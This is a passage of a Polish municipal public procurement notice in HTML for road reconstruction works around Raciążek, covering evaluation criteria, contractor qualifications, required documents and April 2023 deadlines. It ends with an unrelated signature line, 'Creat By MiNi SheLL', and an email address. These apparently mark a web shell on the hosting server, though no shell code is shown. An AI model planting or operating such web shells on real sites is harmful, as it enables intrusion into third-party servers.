649/2 obręb 0008 Raciążek)<br/>11. Przebudowa ulicy Podgórnej w miejscowości Raciążek na dł. 726,23 m – etap II (dz. nr 5 obręb 0003 Podzamcze; 425 obręb 0008 Raciążek)<br/>12. Przebudowa ulicy Sosnowej w miejscowości Podole na dł. 796,32 m (dz. nr 86/2, 177/30, 177/31, 178/8, 178/16, 181/5, 181/43)<br/>13. Przebudowa ulicy Pięknej, Słonecznej, Jasnej w miejscowości Podole na dł. 276,83 m (dz. nr 96/5, 97/3, 97/5 obręb 0005 Podole)<br/>14. Przebudowa drogi gminnej nr 160301C na dł. 560,00 m (dz. nr 45/1 obręb 0004 Siarzewo)<br/>15. Przebudowa drogi gminnej nr 160306C na dł. 906,00 m – etap I (dz. nr 5, 6 obręb 0003 Podzamcze; 229 obręb 0005 Podole) <br/>16. Przebudowa drogi gminnej nr 160306C na dł. 511,00 m – etap II (dz. nr 229 obręb 0005 Podole) <br/>17. Przebudowa drogi gminnej nr 160306C na dł. 870,00 m – etap III (dz. nr 136 obręb 0004 Siarzewo) <br/>18. Przebudowa drogi gminnej nr 160306C na dł. 929,62 m – etap IV (dz. nr 100/1, 136 obręb 0004 Siarzewo) <br/>19. Przebudowa drogi gminnej nr 160337C na dł. 57,21 m (dz. nr 259, 273/2 obręb 0008 Raciążek)<br/>20. Przebudowa drogi gminnej nr 160338C na dł. 143,57 m (dz. nr 573, 643 obręb 0008 Raciążek)<br/>21. Przebudowa drogi wewnętrznej w miejscowości Raciążek na dł. 55,97 m (dz. nr 246/2, 655/28 obręb 0008 Raciążek)<br/>22. Przebudowa drogi wewnętrznej w miejscowości Podole na dł. 598,50 m (dz. nr 101/11 obręb 0005 Podole)<br/>23. Przebudowa drogi wewnętrznej w miejscowości Podole na dł. 81,45 m (dz. nr 195, 218/6, 255 obręb 0005 Podole)<br/>24. Przebudowa drogi wewnętrznej w miejscowości Podzamcze na dł. 432,02 m (dz. nr 75 obręb 0003 Podzamcze)<br/>25. Przebudowa drogi wewnętrznej w miejscowości Podzamcze na dł. 749,64 m (dz. nr 75, 85, 97 obręb 0003 Podzamcze)<br/>26. Przebudowa drogi wewnętrznej w miejscowości Siarzewo na dł. 307,59 m (dz. nr 19, 100/1 obręb 0004 Siarzewo)<br/><br/>Szczegółowo zakres prac do wykonania w ramach przedmiotowego zadania opisany został <br/>w dokumentacji projektowej, stanowiącej załącznik nr 10 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 4906008,62 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">XXI. Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów, i sposobu oceny ofert.<br/>1. Przy ocenie ofert wartość wagowa będzie wyrażona w punktach. Ocena ofert zostanie przeprowadzona wyłącznie w oparciu o<br/>przedstawione poniżej kryteria:<br/>Lp. Kryterium Symbol Waga kryterium Maksymalna liczba punktów w danym kryterium<br/>1. Cena C 60 Pmax1 = 60 pkt<br/>2. Okres rękojmi za wady i gwarancji G 40 Pmax2 = 40 pkt<br/>1) Kryterium 1: Cena<br/>C – liczba punktów przyznanych ocenianej ofercie w kryterium „Cena”, gdzie punkty wyliczane są wg wzoru:<br/>Cmin<br/>C = -------------- x 60 pkt<br/>Cb<br/>Cmin – najniższa cena brutto spośród wszystkich ofert niepodlegających odrzuceniu<br/>Cb – cena brutto oferty badanej<br/>2) Kryterium 2: Okres rękojmi za wady i gwarancji<br/>G – liczba punktów przyznanych ocenianej ofercie w kryterium „Okres rękojmi za wady i gwarancji”, zgodnie z poniższą tabelą:<br/>Lp. Okres gwarancji Liczba punktów<br/>1. 3 lata (minimalny okres) 0 pkt<br/>2. 4 lata 20 pkt<br/>3. 5 lat (maksymalny okres) 40 pkt<br/>Uwaga: Okres rękojmi za wady i gwarancji liczony jest w latach. Wykonawca winien zaoferować w przedmiotowym kryterium okres<br/>rękojmi za wady i gwarancji w pełnych okresach rocznych. Minimalny okres rękojmi za wady i gwarancji wynosi 3 lata. Maksymalny<br/>okres rękojmi za wady i gwarancji wynosi 5 lat.<br/>Jeżeli Wykonawca zaoferuje okres rękojmi za wady i gwarancji krótszy niż 3 lata – oferta takiego Wykonawcy zostanie odrzucona,<br/>jako niezgodna z SWZ.<br/>Jeżeli Wykonawca zaoferuje okres rękojmi za wady i gwarancji dłuższy niż 5 lat – do obliczeń w kryterium zostanie uwzględniony<br/>maksymalny możliwy okres rękojmi za wady i gwarancji wynoszący 5 lat, natomiast do umowy zostanie wpisany okres rękojmi za<br/>wady i gwarancji zaproponowany przez Wykonawcę. Zamawiający przyzna ofercie w tym kryterium 40 pkt.<br/>Jeżeli Wykonawca nie zaoferuje żadnego okresu rękojmi za wady gwarancji lub zaoferuje okres w miesiącach lub niepełnych latach<br/>przyjmuje się, że Wykonawca udzielił 3 lata rękojmi za wady i gwarancji i Zamawiający przyzna ofercie w tym kryterium 0 pkt.<br/>2. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z zasadami arytmetyki.<br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska najwyższą liczbę punktów w określonych przez<br/>Zamawiającego kryteriach.<br/>PŁ = C + G<br/>gdzie:<br/>PŁ - łączna liczba punktów<br/>C - liczba punktów w kryterium: Cena<br/>G - liczba punktów w kryterium: Okres rękojmi za wady i gwarancji<br/>4. Maksymalna łączna liczba punktów jaką może uzyskać Wykonawca wynosi – 100 pkt.<br/>5. Za ofertę najkorzystniejszą uznana zostanie oferta, która w sumie uzyska największą ilość punktów, biorąc pod uwagę kryterium<br/>„Cena” oraz kryterium „Okres rękojmi za wady i gwarancji” spośród ofert nieodrzuconych i spełniających wszystkie wymagania<br/>określone przez Zamawiającego w treści SWZ.<br/>6. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>7. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w<br/>ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>8. Jeżeli nie będzie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert będą przedstawiały taki sam<br/>bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze spośród tych ofert ofertę z najniższą ceną.<br/>9. Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w ust. 8, Zamawiający wezwie Wykonawców, którzy<br/>złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi za wady i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1 nie podlegają wykluczeniu;<br/>1.2 spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1 Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.2.2 Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>1.2.3 Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej lub finansowej niezbędnej do realizacji<br/>zamówienia, jeżeli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż<br/>1.000.000,00 zł.<br/>UWAGA 1!<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek musi spełniać w całości<br/>co najmniej jeden z tych Wykonawców.<br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy<br/>Pzp, powyższy warunek musi spełniać w całości podmiot udostępniający zasoby.<br/>UWAGA 2!<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez<br/>Zamawiającego należy przeliczyć wg średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów A<br/>średnich walut obcych Narodowego Banku Polskiego (NBP) na dzień wystawienia dokumentu.<br/>1.2.4 Zdolności technicznej i zawodowej:<br/>1.2.4.1) w zakresie doświadczenia Wykonawcy:<br/>Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie do realizacji zamówienia, umożliwiające realizację<br/>zamówienia na odpowiednim poziomie jakości, jeżeli Wykonawca wykaże, że wykonał nie wcześniej niż w okresie ostatnich<br/>5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie wykonał należycie minimum<br/>dwa zamówienia odpowiadające swoim rodzajem, robotom budowlanym stanowiącym przedmiot zamówienia polegające na<br/>budowie lub przebudowie lub remoncie dróg o wartości jednostkowej każdego z zamówień równej lub wyższej niż<br/>1.000.000,00 zł brutto.<br/>UWAGA 1!<br/>Za budowę lub przebudowę lub remont Zamawiający uzna przebudowę lub budowę lub remont w rozumieniu ustawy Prawo<br/>budowlane.<br/>Za drogę Zamawiający uzna drogę lub ulicę w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych (tekst<br/>jednolity: Dz. U. z 2022 r., poz. 1693 ze zm.).<br/>UWAGA 2!<br/>Jako wykonanie (zakończenie) zadania należy rozumieć wystawienie co najmniej Świadectwa Przejęcia (dla kontraktów<br/>realizowanych zgodnie z warunkami FIDIC) lub podpisanie Protokołu odbioru robót lub równoważnego dokumentu (w<br/>przypadku zamówień, w których nie wystawia się Świadectwa Przejęcia).<br/>UWAGA 3!<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek musi spełniać w całości<br/>co najmniej jeden z tych Wykonawców.<br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy<br/>Pzp, powyższy warunek musi spełniać w całości podmiot udostępniający zasoby.<br/>UWAGA 4!<br/>Wartości podane w dokumentach potwierdzających spełnienie warunku w walutach innych niż wskazane przez<br/>Zamawiającego należy przeliczyć wg średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów A<br/>średnich walut obcych Narodowego Banku Polskiego (NBP) na dzień wystawienia dokumentu.<br/>1.2.4.2) w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca skieruje do realizacji zamówienia:<br/> minimum jedną osobę, która będzie pełnić funkcję kierownika budowy posiadającego uprawnienia budowlane do<br/>kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej.<br/>UWAGA 1!<br/>Przez uprawnienia budowlane do kierowania robotami należy rozumieć: uprawnienia, o których mowa w ustawie Prawo<br/>budowlane oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831).<br/>Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych dopuszcza<br/>odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów i<br/>uprawniają do kierowania robotami będącymi przedmiotem niniejszego postępowania oraz odpowiadające im uprawnienia<br/>wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.<br/>12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jednolity: Dz. U. z 2021 r., poz. 1646<br/>ze zm.).<br/>UWAGA 2!<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnienie wyżej wymienionego warunku<br/>Wykonawcy mogą wykazać łącznie.<br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy<br/>Pzp, spełnienie wyżej wymienionego warunku Wykonawca wraz z podmiotem udostępniającym zasoby albo podmioty<br/>udostępniające zasoby mogą wykazać łącznie.<br/>2. Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) W celu potwierdzenia<br/>braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/>a) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór stanowi Załącznik nr 6 do<br/>SWZ,<br/>b) odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2) W<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca składa:<br/>a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy,<br/>w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>b) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. Wzór stanowi załącznik nr 7 do SWZ.<br/>UWAGA: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi<br/>Wykonawcami, wykaz, o którym mowa powyżej, dotyczy robót budowlanych, w których wykonaniu Wykonawca bezpośrednio<br/>uczestniczył,<br/>c) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami. Wzór stanowi załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z SWZ <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo musi być dołączone do oferty.<br/>3. W przypadku wspólnego ubiegania się o zamówienia przez Wykonawców, oświadczenie, o którym mowa w Rozdziale X<br/>ust. 2 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane.<br/>5. W przypadku o którym mowa w ust. 4, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy (Wzór oświadczenia<br/>stanowi Załącznik nr 5 do SWZ).<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, każdy z nich zobowiązany jest<br/>złożyć, na wezwanie Zamawiającego, podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia z<br/>postępowania, określone w Rozdziale X ust. 4 pkt 1 SWZ, natomiast spełnianie warunków udziału w postępowaniu<br/>Wykonawcy wykazują zgodnie z Rozdziałem VIII ust. 1 pkt 1.2 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we wzorze umowy, stanowiącym załącznik nr 9 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we wzorze umowy, stanowiącym załącznik nr 9 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://raciazek.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-20 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dodatkowe informacje w SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com